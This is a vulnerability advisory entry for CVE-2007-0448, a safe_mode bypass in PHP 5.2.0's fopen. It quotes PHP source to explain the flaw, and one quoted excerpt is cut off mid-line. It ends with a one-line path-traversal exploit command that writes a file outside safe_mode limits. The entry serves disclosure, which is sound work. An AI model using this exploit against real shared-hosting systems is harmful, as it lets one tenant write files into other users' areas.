PHP fopen Safe_Mode Security Restriction Bypass Vulnerability

Vulnerability ID 1112088 Vulnerability Type Code Injection
Published 2007-01-26 Updated 2007-05-23
CVE ID CVE-2007-0448 CNNVD ID CNNVD-200705-489
Platform PHP CVSS Score 10.0
|Vulnerability Sources
https://www.exploit-db.com/exploits/29528
https://www.securityfocus.com/bid/22261
https://cxsecurity.com/issue/WLB-2007010090
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-489
|Vulnerability Details
PHP is a widely used general-purpose scripting language that is especially suited to Web development and can be embedded in HTML. PHP's implementation of fopen contains a vulnerability: a remote attacker could exploit it to bypass the safe_mode security restrictions by opening a file in write mode.

In the fopen() function:

--845-845--- Code from PHP 5.2.0 ext/standard/file.c [START]
    stream = php_stream_open_wrapper_ex(filename, mode, (use_include_path ? USE_PATH : 0) | ENFORCE_SAFE_MODE | REPORT_ERRORS, NULL, context);
--845-845--- Code from PHP 5.2.0 ext/standard/file.c [END]

In the file safe_mode.c:

--142-152--- Code from main/safe_mode.c [START]
    ret = VCWD_STAT(path, &sb);
    if (ret < 0) {
        if ((flags & CHECKUID_NO_ERRORS) == 0) {
            php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unable to access %s", filename);
        }
        return 0;
    }

    duid = sb.st_uid;
    dgid = sb.st_gid;

    if (duid == php_getuid()) {
        return 1;
--142-152--- Code from main/safe_mode.c [END]

If duid == php_getuid() holds, safe_mode is bypassed. The owner uid compared here comes from VCWD_STAT, which is defined as:

    #define VCWD_STAT(path, buff) virtual_stat(path, buff TSRMLS_CC)

In the virtual_stat() function:

--831-845--- Code from TSRM/tsrm_virtual_cwd.c [START]
    CWD_API int virtual_stat(const char *path, struct stat *buf TSRMLS_DC)
    {
        cwd_state new_state;
        int retval;

        CWD_STATE_COPY(&new_state, &CWDG(cwd));
        if (virtual_file_ex(&new_state, path, NULL, 1)) {
            return -1;
        }

        retval = stat(
|Vulnerability EXP
source: http://www.securityfocus.com/bid/22261/info

PHP is prone to a 'safe_mode' restriction-bypass vulnerability. Successful exploits could allow an attacker to write files in unauthorized locations; other attacks may also be possible.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code, all assuming that the 'safe_mode' restriction will isolate users from each other.

This issue is reported to affect PHP version 5.2.0; other versions may also be vulnerable.

php -r 'fopen("srpath://../../../../../../../dir/pliczek", "a");'
|Affected Products
PHP PHP 5.2 + Debian Linux 4.0 sparc + Debian Linux 4.0 s/390 + Debian Linux 4.0 powerpc
|References

Source: BID
Name: 22261
Link: http://www.securityfocus.com/bid/22261
Source: SREASONRES
Name: 20070125 PHP 5.2.0 safe_mode bypass (by Writing Mode)
Link: http://securityreason.com/achievement_securityalert/44
Source: SREASON
Name: 2175
Link: http://securityreason.com/securityalert/2175